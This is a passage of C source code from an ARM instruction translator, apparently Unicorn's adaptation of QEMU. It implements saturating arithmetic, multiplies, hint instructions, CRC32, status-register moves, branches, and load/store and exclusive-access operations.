tcg_gen_mulu2_i32(tcg_ctx, t0, t1, t0, t1); zero = tcg_const_i32(tcg_ctx, 0); t2 = load_reg(s, a->ra); tcg_gen_add2_i32(tcg_ctx, t0, t1, t0, t1, t2, zero); tcg_temp_free_i32(tcg_ctx, t2); t2 = load_reg(s, a->rd); tcg_gen_add2_i32(tcg_ctx, t0, t1, t0, t1, t2, zero); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, zero); store_reg(s, a->ra, t0); store_reg(s, a->rd, t1); return true; } /* * Saturating addition and subtraction */ static bool op_qaddsub(DisasContext *s, arg_rrr *a, bool add, bool doub) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t0, t1; if (s->thumb ? !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP) : !ENABLE_ARCH_5TE) { return false; } t0 = load_reg(s, a->rm); t1 = load_reg(s, a->rn); if (doub) { gen_helper_add_saturate(tcg_ctx, t1, tcg_ctx->cpu_env, t1, t1); } if (add) { gen_helper_add_saturate(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); } else { gen_helper_sub_saturate(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); } tcg_temp_free_i32(tcg_ctx, t1); store_reg(s, a->rd, t0); return true; } #define DO_QADDSUB(NAME, ADD, DOUB) \ static bool trans_##NAME(DisasContext *s, arg_rrr *a) \ { \ return op_qaddsub(s, a, ADD, DOUB); \ } DO_QADDSUB(QADD, true, false) DO_QADDSUB(QSUB, false, false) DO_QADDSUB(QDADD, true, true) DO_QADDSUB(QDSUB, false, true) #undef DO_QADDSUB /* * Halfword multiply and multiply accumulate */ static bool op_smlaxxx(DisasContext *s, arg_rrrr *a, int add_long, bool nt, bool mt) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t0, t1, tl, th; if (s->thumb ? !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP) : !ENABLE_ARCH_5TE) { return false; } t0 = load_reg(s, a->rn); t1 = load_reg(s, a->rm); gen_mulxy(tcg_ctx, t0, t1, nt, mt); tcg_temp_free_i32(tcg_ctx, t1); switch (add_long) { case 0: store_reg(s, a->rd, t0); break; case 1: t1 = load_reg(s, a->ra); gen_helper_add_setq(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); tcg_temp_free_i32(tcg_ctx, t1); store_reg(s, a->rd, t0); break; case 2: tl = load_reg(s, a->ra); th = load_reg(s, a->rd); /* Sign-extend the 32-bit product to 64 bits. */ t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_sari_i32(tcg_ctx, t1, t0, 31); tcg_gen_add2_i32(tcg_ctx, tl, th, tl, th, t0, t1); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); store_reg(s, a->ra, tl); store_reg(s, a->rd, th); break; default: g_assert_not_reached(); break; } return true; } #define DO_SMLAX(NAME, add, nt, mt) \ static bool trans_##NAME(DisasContext *s, arg_rrrr *a) \ { \ return op_smlaxxx(s, a, add, nt, mt); \ } DO_SMLAX(SMULBB, 0, 0, 0) DO_SMLAX(SMULBT, 0, 0, 1) DO_SMLAX(SMULTB, 0, 1, 0) DO_SMLAX(SMULTT, 0, 1, 1) DO_SMLAX(SMLABB, 1, 0, 0) DO_SMLAX(SMLABT, 1, 0, 1) DO_SMLAX(SMLATB, 1, 1, 0) DO_SMLAX(SMLATT, 1, 1, 1) DO_SMLAX(SMLALBB, 2, 0, 0) DO_SMLAX(SMLALBT, 2, 0, 1) DO_SMLAX(SMLALTB, 2, 1, 0) DO_SMLAX(SMLALTT, 2, 1, 1) #undef DO_SMLAX static bool op_smlawx(DisasContext *s, arg_rrrr *a, bool add, bool mt) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t0, t1; if (!ENABLE_ARCH_5TE) { return false; } t0 = load_reg(s, a->rn); t1 = load_reg(s, a->rm); /* * Since the nominal result is product<47:16>, shift the 16-bit * input up by 16 bits, so that the result is at product<63:32>. */ if (mt) { tcg_gen_andi_i32(tcg_ctx, t1, t1, 0xffff0000); } else { tcg_gen_shli_i32(tcg_ctx, t1, t1, 16); } tcg_gen_muls2_i32(tcg_ctx, t0, t1, t0, t1); tcg_temp_free_i32(tcg_ctx, t0); if (add) { t0 = load_reg(s, a->ra); gen_helper_add_setq(tcg_ctx, t1, tcg_ctx->cpu_env, t1, t0); tcg_temp_free_i32(tcg_ctx, t0); } store_reg(s, a->rd, t1); return true; } #define DO_SMLAWX(NAME, add, mt) \ static bool trans_##NAME(DisasContext *s, arg_rrrr *a) \ { \ return op_smlawx(s, a, add, mt); \ } DO_SMLAWX(SMULWB, 0, 0) DO_SMLAWX(SMULWT, 0, 1) DO_SMLAWX(SMLAWB, 1, 0) DO_SMLAWX(SMLAWT, 1, 1) #undef DO_SMLAWX /* * MSR (immediate) and hints */ static bool trans_YIELD(DisasContext *s, arg_YIELD *a) { /* * When running single-threaded TCG code, use the helper to ensure that * the next round-robin scheduled vCPU gets a crack. When running in * MTTCG we don't generate jumps to the helper as it won't affect the * scheduling of other vCPUs. */ if (!(tb_cflags(s->base.tb) & CF_PARALLEL)) { gen_set_pc_im(s, s->base.pc_next); s->base.is_jmp = DISAS_YIELD; } return true; } static bool trans_WFE(DisasContext *s, arg_WFE *a) { /* * When running single-threaded TCG code, use the helper to ensure that * the next round-robin scheduled vCPU gets a crack. In MTTCG mode we * just skip this instruction. Currently the SEV/SEVL instructions, * which are *one* of many ways to wake the CPU from WFE, are not * implemented so we can't sleep like WFI does. */ if (!(tb_cflags(s->base.tb) & CF_PARALLEL)) { gen_set_pc_im(s, s->base.pc_next); s->base.is_jmp = DISAS_WFE; } return true; } static bool trans_WFI(DisasContext *s, arg_WFI *a) { /* For WFI, halt the vCPU until an IRQ. */ gen_set_pc_im(s, s->base.pc_next); s->base.is_jmp = DISAS_WFI; return true; } static bool trans_NOP(DisasContext *s, arg_NOP *a) { return true; } static bool trans_MSR_imm(DisasContext *s, arg_MSR_imm *a) { uint32_t val = ror32(a->imm, a->rot * 2); uint32_t mask = msr_mask(s, a->mask, a->r); if (gen_set_psr_im(s, mask, a->r, val)) { unallocated_encoding(s); } return true; } /* * Cyclic Redundancy Check */ static bool op_crc32(DisasContext *s, arg_rrr *a, bool c, MemOp sz) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1, t2, t3; if (!dc_isar_feature(aa32_crc32, s)) { return false; } t1 = load_reg(s, a->rn); t2 = load_reg(s, a->rm); switch (sz) { case MO_8: gen_uxtb(t2); break; case MO_16: gen_uxth(t2); break; case MO_32: break; default: g_assert_not_reached(); break; } t3 = tcg_const_i32(tcg_ctx, 1 << sz); if (c) { gen_helper_crc32c(tcg_ctx, t1, t1, t2, t3); } else { gen_helper_crc32(tcg_ctx, t1, t1, t2, t3); } tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); store_reg(s, a->rd, t1); return true; } #define DO_CRC32(NAME, c, sz) \ static bool trans_##NAME(DisasContext *s, arg_rrr *a) \ { return op_crc32(s, a, c, sz); } DO_CRC32(CRC32B, false, MO_8) DO_CRC32(CRC32H, false, MO_16) DO_CRC32(CRC32W, false, MO_32) DO_CRC32(CRC32CB, true, MO_8) DO_CRC32(CRC32CH, true, MO_16) DO_CRC32(CRC32CW, true, MO_32) #undef DO_CRC32 /* * Miscellaneous instructions */ static bool trans_MRS_bank(DisasContext *s, arg_MRS_bank *a) { if (arm_dc_feature(s, ARM_FEATURE_M)) { return false; } gen_mrs_banked(s, a->r, a->sysm, a->rd); return true; } static bool trans_MSR_bank(DisasContext *s, arg_MSR_bank *a) { if (arm_dc_feature(s, ARM_FEATURE_M)) { return false; } gen_msr_banked(s, a->r, a->sysm, a->rn); return true; } static bool trans_MRS_reg(DisasContext *s, arg_MRS_reg *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (arm_dc_feature(s, ARM_FEATURE_M)) { return false; } if (a->r) { if (IS_USER(s)) { unallocated_encoding(s); return true; } tmp = load_cpu_field(tcg_ctx, spsr); } else { tmp = tcg_temp_new_i32(tcg_ctx); gen_helper_cpsr_read(tcg_ctx, tmp, tcg_ctx->cpu_env); } store_reg(s, a->rd, tmp); return true; } static bool trans_MSR_reg(DisasContext *s, arg_MSR_reg *a) { TCGv_i32 tmp; uint32_t mask = msr_mask(s, a->mask, a->r); if (arm_dc_feature(s, ARM_FEATURE_M)) { return false; } tmp = load_reg(s, a->rn); if (gen_set_psr(s, mask, a->r, tmp)) { unallocated_encoding(s); } return true; } static bool trans_MRS_v7m(DisasContext *s, arg_MRS_v7m *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (!arm_dc_feature(s, ARM_FEATURE_M)) { return false; } tmp = tcg_const_i32(tcg_ctx, a->sysm); gen_helper_v7m_mrs(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); store_reg(s, a->rd, tmp); return true; } static bool trans_MSR_v7m(DisasContext *s, arg_MSR_v7m *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 addr, reg; if (!arm_dc_feature(s, ARM_FEATURE_M)) { return false; } addr = tcg_const_i32(tcg_ctx, (a->mask << 10) | a->sysm); reg = load_reg(s, a->rn); gen_helper_v7m_msr(tcg_ctx, tcg_ctx->cpu_env, addr, reg); tcg_temp_free_i32(tcg_ctx, addr); tcg_temp_free_i32(tcg_ctx, reg); /* If we wrote to CONTROL, the EL might have changed */ gen_helper_rebuild_hflags_m32_newel(tcg_ctx, tcg_ctx->cpu_env); gen_lookup_tb(s); return true; } static bool trans_BX(DisasContext *s, arg_BX *a) { if (!ENABLE_ARCH_4T) { return false; } gen_bx_excret(s, load_reg(s, a->rm)); return true; } static bool trans_BXJ(DisasContext *s, arg_BXJ *a) { if (!ENABLE_ARCH_5J || arm_dc_feature(s, ARM_FEATURE_M)) { return false; } /* Trivial implementation equivalent to bx. */ gen_bx(s, load_reg(s, a->rm)); return true; } static bool trans_BLX_r(DisasContext *s, arg_BLX_r *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (!ENABLE_ARCH_5) { return false; } tmp = load_reg(s, a->rm); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[14], s->base.pc_next | s->thumb); gen_bx(s, tmp); return true; } /* * BXNS/BLXNS: only exist for v8M with the security extensions, * and always UNDEF if NonSecure. We don't implement these in * the user-only mode either (in theory you can use them from * Secure User mode but they are too tied in to system emulation). */ static bool trans_BXNS(DisasContext *s, arg_BXNS *a) { if (!s->v8m_secure || IS_USER_ONLY) { unallocated_encoding(s); } else { gen_bxns(s, a->rm); } return true; } static bool trans_BLXNS(DisasContext *s, arg_BLXNS *a) { if (!s->v8m_secure || IS_USER_ONLY) { unallocated_encoding(s); } else { gen_blxns(s, a->rm); } return true; } static bool trans_CLZ(DisasContext *s, arg_CLZ *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (!ENABLE_ARCH_5) { return false; } tmp = load_reg(s, a->rm); tcg_gen_clzi_i32(tcg_ctx, tmp, tmp, 32); store_reg(s, a->rd, tmp); return true; } static bool trans_ERET(DisasContext *s, arg_ERET *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (!arm_dc_feature(s, ARM_FEATURE_V7VE)) { return false; } if (IS_USER(s)) { unallocated_encoding(s); return true; } if (s->current_el == 2) { /* ERET from Hyp uses ELR_Hyp, not LR */ tmp = load_cpu_field(tcg_ctx, elr_el[2]); } else { tmp = load_reg(s, 14); } gen_exception_return(s, tmp); return true; } static bool trans_HLT(DisasContext *s, arg_HLT *a) { gen_hlt(s, a->imm); return true; } static bool trans_BKPT(DisasContext *s, arg_BKPT *a) { if (!ENABLE_ARCH_5) { return false; } if (arm_dc_feature(s, ARM_FEATURE_M) && false && // semihosting_enabled() && !IS_USER(s) && (a->imm == 0xab)) { gen_exception_internal_insn(s, s->pc_curr, EXCP_SEMIHOST); } else { gen_exception_bkpt_insn(s, syn_aa32_bkpt(a->imm, false)); } return true; } static bool trans_HVC(DisasContext *s, arg_HVC *a) { if (!ENABLE_ARCH_7 || arm_dc_feature(s, ARM_FEATURE_M)) { return false; } if (IS_USER(s)) { unallocated_encoding(s); } else { gen_hvc(s, a->imm); } return true; } static bool trans_SMC(DisasContext *s, arg_SMC *a) { if (!ENABLE_ARCH_6K || arm_dc_feature(s, ARM_FEATURE_M)) { return false; } if (IS_USER(s)) { unallocated_encoding(s); } else { gen_smc(s); } return true; } static bool trans_SG(DisasContext *s, arg_SG *a) { if (!arm_dc_feature(s, ARM_FEATURE_M) || !arm_dc_feature(s, ARM_FEATURE_V8)) { return false; } /* * SG (v8M only) * The bulk of the behaviour for this instruction is implemented * in v7m_handle_execute_nsc(), which deals with the insn when * it is executed by a CPU in non-secure state from memory * which is Secure & NonSecure-Callable. * Here we only need to handle the remaining cases: * * in NS memory (including the "security extension not * implemented" case) : NOP * * in S memory but CPU already secure (clear IT bits) * We know that the attribute for the memory this insn is * in must match the current CPU state, because otherwise * get_phys_addr_pmsav8 would have generated an exception. */ if (s->v8m_secure) { /* Like the IT insn, we don't need to generate any code */ s->condexec_cond = 0; s->condexec_mask = 0; } return true; } static bool trans_TT(DisasContext *s, arg_TT *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 addr, tmp; if (!arm_dc_feature(s, ARM_FEATURE_M) || !arm_dc_feature(s, ARM_FEATURE_V8)) { return false; } if (a->rd == 13 || a->rd == 15 || a->rn == 15) { /* We UNDEF for these UNPREDICTABLE cases */ unallocated_encoding(s); return true; } if (a->A && !s->v8m_secure) { /* This case is UNDEFINED. */ unallocated_encoding(s); return true; } addr = load_reg(s, a->rn); tmp = tcg_const_i32(tcg_ctx, (a->A << 1) | a->T); gen_helper_v7m_tt(tcg_ctx, tmp, tcg_ctx->cpu_env, addr, tmp); tcg_temp_free_i32(tcg_ctx, addr); store_reg(s, a->rd, tmp); return true; } /* * Load/store register index */ static ISSInfo make_issinfo(DisasContext *s, int rd, bool p, bool w) { ISSInfo ret; /* ISS not valid if writeback */ if (p && !w) { ret = rd; if (s->base.pc_next - s->pc_curr == 2) { ret |= ISSIs16Bit; } } else { ret = ISSInvalid; } return ret; } static TCGv_i32 op_addr_rr_pre(DisasContext *s, arg_ldst_rr *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 addr = load_reg(s, a->rn); if (s->v8m_stackcheck && a->rn == 13 && a->w) { gen_helper_v8m_stackcheck(tcg_ctx, tcg_ctx->cpu_env, addr); } if (a->p) { TCGv_i32 ofs = load_reg(s, a->rm); gen_arm_shift_im(tcg_ctx, ofs, a->shtype, a->shimm, 0); if (a->u) { tcg_gen_add_i32(tcg_ctx, addr, addr, ofs); } else { tcg_gen_sub_i32(tcg_ctx, addr, addr, ofs); } tcg_temp_free_i32(tcg_ctx, ofs); } return addr; } static void op_addr_rr_post(DisasContext *s, arg_ldst_rr *a, TCGv_i32 addr, int address_offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!a->p) { TCGv_i32 ofs = load_reg(s, a->rm); gen_arm_shift_im(tcg_ctx, ofs, a->shtype, a->shimm, 0); if (a->u) { tcg_gen_add_i32(tcg_ctx, addr, addr, ofs); } else { tcg_gen_sub_i32(tcg_ctx, addr, addr, ofs); } tcg_temp_free_i32(tcg_ctx, ofs); } else if (!a->w) { tcg_temp_free_i32(tcg_ctx, addr); return; } tcg_gen_addi_i32(tcg_ctx, addr, addr, address_offset); store_reg(s, a->rn, addr); } static bool op_load_rr(DisasContext *s, arg_ldst_rr *a, MemOp mop, int mem_idx) { TCGContext *tcg_ctx = s->uc->tcg_ctx; ISSInfo issinfo = make_issinfo(s, a->rt, a->p, a->w); TCGv_i32 addr, tmp; addr = op_addr_rr_pre(s, a); tmp = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld_i32(s, tmp, addr, mem_idx, mop | s->be_data); disas_set_da_iss(s, mop, issinfo); /* * Perform base writeback before the loaded value to * ensure correct behavior with overlapping index registers. */ op_addr_rr_post(s, a, addr, 0); store_reg_from_load(s, a->rt, tmp); return true; } static bool op_store_rr(DisasContext *s, arg_ldst_rr *a, MemOp mop, int mem_idx) { TCGContext *tcg_ctx = s->uc->tcg_ctx; ISSInfo issinfo = make_issinfo(s, a->rt, a->p, a->w) | ISSIsWrite; TCGv_i32 addr, tmp; addr = op_addr_rr_pre(s, a); tmp = load_reg(s, a->rt); gen_aa32_st_i32(s, tmp, addr, mem_idx, mop | s->be_data); disas_set_da_iss(s, mop, issinfo); tcg_temp_free_i32(tcg_ctx, tmp); op_addr_rr_post(s, a, addr, 0); return true; } static bool trans_LDRD_rr(DisasContext *s, arg_ldst_rr *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int mem_idx = get_mem_index(s); TCGv_i32 addr, tmp; if (!ENABLE_ARCH_5TE) { return false; } if (a->rt & 1) { unallocated_encoding(s); return true; } addr = op_addr_rr_pre(s, a); tmp = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld_i32(s, tmp, addr, mem_idx, MO_UL | s->be_data); store_reg(s, a->rt, tmp); tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); tmp = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld_i32(s, tmp, addr, mem_idx, MO_UL | s->be_data); store_reg(s, a->rt + 1, tmp); /* LDRD w/ base writeback is undefined if the registers overlap. */ op_addr_rr_post(s, a, addr, -4); return true; } static bool trans_STRD_rr(DisasContext *s, arg_ldst_rr *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int mem_idx = get_mem_index(s); TCGv_i32 addr, tmp; if (!ENABLE_ARCH_5TE) { return false; } if (a->rt & 1) { unallocated_encoding(s); return true; } addr = op_addr_rr_pre(s, a); tmp = load_reg(s, a->rt); gen_aa32_st_i32(s, tmp, addr, mem_idx, MO_UL | s->be_data); tcg_temp_free_i32(tcg_ctx, tmp); tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); tmp = load_reg(s, a->rt + 1); gen_aa32_st_i32(s, tmp, addr, mem_idx, MO_UL | s->be_data); tcg_temp_free_i32(tcg_ctx, tmp); op_addr_rr_post(s, a, addr, -4); return true; } /* * Load/store immediate index */ static TCGv_i32 op_addr_ri_pre(DisasContext *s, arg_ldst_ri *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int ofs = a->imm; if (!a->u) { ofs = -ofs; } if (s->v8m_stackcheck && a->rn == 13 && a->w) { /* * Stackcheck. Here we know 'addr' is the current SP; * U is set if we're moving SP up, else down. It is * UNKNOWN whether the limit check triggers when SP starts * below the limit and ends up above it; we chose to do so. */ if (!a->u) { TCGv_i32 newsp = tcg_temp_new_i32(tcg_ctx); tcg_gen_addi_i32(tcg_ctx, newsp, tcg_ctx->cpu_R[13], ofs); gen_helper_v8m_stackcheck(tcg_ctx, tcg_ctx->cpu_env, newsp); tcg_temp_free_i32(tcg_ctx, newsp); } else { gen_helper_v8m_stackcheck(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->cpu_R[13]); } } return add_reg_for_lit(s, a->rn, a->p ? ofs : 0); } static void op_addr_ri_post(DisasContext *s, arg_ldst_ri *a, TCGv_i32 addr, int address_offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!a->p) { if (a->u) { address_offset += a->imm; } else { address_offset -= a->imm; } } else if (!a->w) { tcg_temp_free_i32(tcg_ctx, addr); return; } tcg_gen_addi_i32(tcg_ctx, addr, addr, address_offset); store_reg(s, a->rn, addr); } static bool op_load_ri(DisasContext *s, arg_ldst_ri *a, MemOp mop, int mem_idx) { TCGContext *tcg_ctx = s->uc->tcg_ctx; ISSInfo issinfo = make_issinfo(s, a->rt, a->p, a->w); TCGv_i32 addr, tmp; addr = op_addr_ri_pre(s, a); tmp = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld_i32(s, tmp, addr, mem_idx, mop | s->be_data); disas_set_da_iss(s, mop, issinfo); /* * Perform base writeback before the loaded value to * ensure correct behavior with overlapping index registers. */ op_addr_ri_post(s, a, addr, 0); store_reg_from_load(s, a->rt, tmp); return true; } static bool op_store_ri(DisasContext *s, arg_ldst_ri *a, MemOp mop, int mem_idx) { TCGContext *tcg_ctx = s->uc->tcg_ctx; ISSInfo issinfo = make_issinfo(s, a->rt, a->p, a->w) | ISSIsWrite; TCGv_i32 addr, tmp; addr = op_addr_ri_pre(s, a); tmp = load_reg(s, a->rt); gen_aa32_st_i32(s, tmp, addr, mem_idx, mop | s->be_data); disas_set_da_iss(s, mop, issinfo); tcg_temp_free_i32(tcg_ctx, tmp); op_addr_ri_post(s, a, addr, 0); return true; } static bool op_ldrd_ri(DisasContext *s, arg_ldst_ri *a, int rt2) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int mem_idx = get_mem_index(s); TCGv_i32 addr, tmp; addr = op_addr_ri_pre(s, a); tmp = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld_i32(s, tmp, addr, mem_idx, MO_UL | s->be_data); store_reg(s, a->rt, tmp); tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); tmp = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld_i32(s, tmp, addr, mem_idx, MO_UL | s->be_data); store_reg(s, rt2, tmp); /* LDRD w/ base writeback is undefined if the registers overlap. */ op_addr_ri_post(s, a, addr, -4); return true; } static bool trans_LDRD_ri_a32(DisasContext *s, arg_ldst_ri *a) { if (!ENABLE_ARCH_5TE || (a->rt & 1)) { return false; } return op_ldrd_ri(s, a, a->rt + 1); } static bool trans_LDRD_ri_t32(DisasContext *s, arg_ldst_ri2 *a) { arg_ldst_ri b = { .u = a->u, .w = a->w, .p = a->p, .rn = a->rn, .rt = a->rt, .imm = a->imm }; return op_ldrd_ri(s, &b, a->rt2); } static bool op_strd_ri(DisasContext *s, arg_ldst_ri *a, int rt2) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int mem_idx = get_mem_index(s); TCGv_i32 addr, tmp; addr = op_addr_ri_pre(s, a); tmp = load_reg(s, a->rt); gen_aa32_st_i32(s, tmp, addr, mem_idx, MO_UL | s->be_data); tcg_temp_free_i32(tcg_ctx, tmp); tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); tmp = load_reg(s, rt2); gen_aa32_st_i32(s, tmp, addr, mem_idx, MO_UL | s->be_data); tcg_temp_free_i32(tcg_ctx, tmp); op_addr_ri_post(s, a, addr, -4); return true; } static bool trans_STRD_ri_a32(DisasContext *s, arg_ldst_ri *a) { if (!ENABLE_ARCH_5TE || (a->rt & 1)) { return false; } return op_strd_ri(s, a, a->rt + 1); } static bool trans_STRD_ri_t32(DisasContext *s, arg_ldst_ri2 *a) { arg_ldst_ri b = { .u = a->u, .w = a->w, .p = a->p, .rn = a->rn, .rt = a->rt, .imm = a->imm }; return op_strd_ri(s, &b, a->rt2); } #define DO_LDST(NAME, WHICH, MEMOP) \ static bool trans_##NAME##_ri(DisasContext *s, arg_ldst_ri *a) \ { \ return op_##WHICH##_ri(s, a, MEMOP, get_mem_index(s)); \ } \ static bool trans_##NAME##T_ri(DisasContext *s, arg_ldst_ri *a) \ { \ return op_##WHICH##_ri(s, a, MEMOP, get_a32_user_mem_index(s)); \ } \ static bool trans_##NAME##_rr(DisasContext *s, arg_ldst_rr *a) \ { \ return op_##WHICH##_rr(s, a, MEMOP, get_mem_index(s)); \ } \ static bool trans_##NAME##T_rr(DisasContext *s, arg_ldst_rr *a) \ { \ return op_##WHICH##_rr(s, a, MEMOP, get_a32_user_mem_index(s)); \ } DO_LDST(LDR, load, MO_UL) DO_LDST(LDRB, load, MO_UB) DO_LDST(LDRH, load, MO_UW) DO_LDST(LDRSB, load, MO_SB) DO_LDST(LDRSH, load, MO_SW) DO_LDST(STR, store, MO_UL) DO_LDST(STRB, store, MO_UB) DO_LDST(STRH, store, MO_UW) #undef DO_LDST /* * Synchronization primitives */ static bool op_swp(DisasContext *s, arg_SWP *a, MemOp opc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 addr, tmp; TCGv taddr; opc |= s->be_data; addr = load_reg(s, a->rn); taddr = gen_aa32_addr(s, addr, opc); tcg_temp_free_i32(tcg_ctx, addr); tmp = load_reg(s, a->rt2); tcg_gen_atomic_xchg_i32(tcg_ctx, tmp, taddr, tmp, get_mem_index(s), opc); tcg_temp_free(tcg_ctx, taddr); store_reg(s, a->rt, tmp); return true; } static bool trans_SWP(DisasContext *s, arg_SWP *a) { return op_swp(s, a, MO_UL | MO_ALIGN); } static bool trans_SWPB(DisasContext *s, arg_SWP *a) { return op_swp(s, a, MO_UB); } /* * Load/Store Exclusive and Load-Acquire/Store-Release */ static bool op_strex(DisasContext *s, arg_STREX *a, MemOp mop, bool rel) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 addr; /* Some cases stopped being UNPREDICTABLE in v8A (but not v8M) */ bool v8a = ENABLE_ARCH_8 && !arm_dc_feature(s, ARM_FEATURE_M); /* We UNDEF for these UNPREDICTABLE cases. */ if (a->rd == 15 || a->rn == 15 || a->rt == 15 || a->rd == a->rn || a->rd == a->rt || (!v8a && s->thumb && (a->rd == 13 || a->rt == 13)) || (mop == MO_64 && (a->rt2 == 15 || a->rd == a->rt2 || (!v8a && s->thumb && a->rt2 == 13)))) { unallocated_encoding(s); return true; } if (rel) { tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_STRL); } addr = tcg_temp_local_new_i32(tcg_ctx); load_reg_var(s, addr, a->rn); tcg_gen_addi_i32(tcg_ctx, addr, addr, a->imm); gen_store_exclusive(s, a->rd, a->rt, a->rt2, addr, mop); tcg_temp_free_i32(tcg_ctx, addr); return true; } static bool trans_STREX(DisasContext *s, arg_STREX *a) { if (!ENABLE_ARCH_6) { return false; } return op_strex(s, a, MO_32, false); } static bool trans_STREXD_a32(DisasContext *s, arg_STREX *a) { if (!ENABLE_ARCH_6K) { return false; } /* We UNDEF for these UNPREDICTABLE cases. */ if (a->rt & 1) { unallocated_encoding(s); return true; } a->rt2 = a->rt + 1; return op_strex(s, a, MO_64, false); } static bool trans_STREXD_t32(DisasContext *s, arg_STREX *a) { return op_strex(s, a, MO_64, false); } static bool trans_STREXB(DisasContext *s, arg_STREX *a) { if (s->thumb ? !ENABLE_ARCH_7 : !ENABLE_ARCH_6K) { return false; } return op_strex(s, a, MO_8, false); } static bool trans_STREXH(DisasContext *s, arg_STREX *a) { if (s->thumb ? !ENABLE_ARCH_7 : !ENABLE_ARCH_6K) { return false; } return op_strex(s, a, MO_16, false); } static bool trans_STLEX(DisasContext *s, arg_STREX *a) { if (!ENABLE_ARCH_8) { return false; } return op_strex(s, a, MO_32, true); } static bool trans_STLEXD_a32(DisasContext *s, arg_STREX *a) { if (!ENABLE_ARCH_8) { return false; } /* We UNDEF for these UNPREDICTABLE cases. */ if (a->rt & 1) { unallocated_encoding(s); return true; } a->rt2 = a->rt + 1; return op_strex(s, a, MO_64, true); } static bool trans_STLEXD_t32(DisasContext *s, arg_STREX *a) { if (!ENABLE_ARCH_8) { return false; } return op_strex(s, a, MO_64, true); } static bool trans_STLEXB(DisasContext *s, arg_STREX *a) { if (!ENABLE_ARCH_8) { return false; } return op_strex(s, a, MO_8, true); } static bool trans_STLEXH(DisasContext *s, arg_STREX *a) { if (!ENABLE_ARCH_8) { return false; } return op_strex(s, a, MO_16, true); } static bool op_stl(DisasContext *s, arg_STL *a, MemOp mop) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 addr, tmp; if (!ENABLE_ARCH_8) { return false; } /* We UNDEF for these UNPREDICTABLE cases. */ if (a->rn == 15 || a->rt == 15) { unallocated_encoding(s); return true; } addr = load_reg(s, a->rn); tmp = load_reg(s, a->rt); tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_STRL); gen_aa32_st_i32(s, tmp, addr, get_mem_index(s), mop | s->be_data); disas_set_da_iss(s, mop, a->rt | ISSIsAcqRel | ISSIsWrite); tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, addr); return true; } static bool trans_STL(DisasContext *s, arg_STL *a) { return op_stl(s, a, MO_UL); } static bool trans_STLB(DisasContext *s, arg_STL *a) { return op_stl(s, a, MO_UB); } static bool trans_STLH(DisasContext *s, arg_STL *a) { return op_stl(s, a, MO_UW); } static bool op_ldrex(DisasContext *s, arg_LDREX *a, MemOp mop, bool acq) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 addr; /* Some cases stopped being UNPREDICTABLE in v8A (but not v8M) */ bool v8a = ENABLE_ARCH_8 && !arm_dc_feature(s, ARM_FEATURE_M); /* We UNDEF for these UNPREDICTABLE cases. */ if (a->rn == 15 || a->rt == 15 || (!v8a && s->thumb && a->rt == 13) || (mop == MO_64 && (a->rt2 == 15 || a->rt == a->rt2 || (!v8a && s->thumb && a->rt2 == 13)))) { unallocated_encoding(s); return true; } addr = tcg_temp_local_new_i32(tcg_ctx); load_reg_var(s, addr, a->rn); tcg_gen_addi_i32(tcg_ctx, addr, addr, a->imm); gen_load_exclusive(s, a->rt, a->rt2, addr, mop); tcg_temp_free_i32(tcg_ctx, addr); if (acq) { tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_LDAQ); } return true; } static bool trans_LDREX(DisasContext *s, arg_LDREX *a) { if (!ENABLE_ARCH_6) { return false; } return op_ldrex(s, a, MO_32, false); } static bool trans_LDREXD_a32(DisasContext *s, arg_LDREX *a) { if (!ENABLE_ARCH_6K) { return false; } /* We UNDEF for these UNPREDICTABLE cases. */ if 